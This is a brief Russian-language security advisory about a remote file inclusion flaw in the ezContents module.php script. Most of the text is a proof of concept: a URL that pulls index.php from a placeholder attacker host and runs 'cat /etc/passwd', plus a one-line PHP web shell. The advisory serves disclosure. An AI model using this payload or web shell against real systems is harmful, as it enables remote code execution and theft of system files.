Программа: ezContents
Уязвимость обнаружена в ezContents. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевой системе.
Сценарий module.php не фильтрует данные, представленные пользователем в переменной 'link':
http://[target]/module.php?link= http://[attacker]/index.php&cmd=cat /etc/passwd
----index.php----
<?
system($cmd);
?>
-----------------
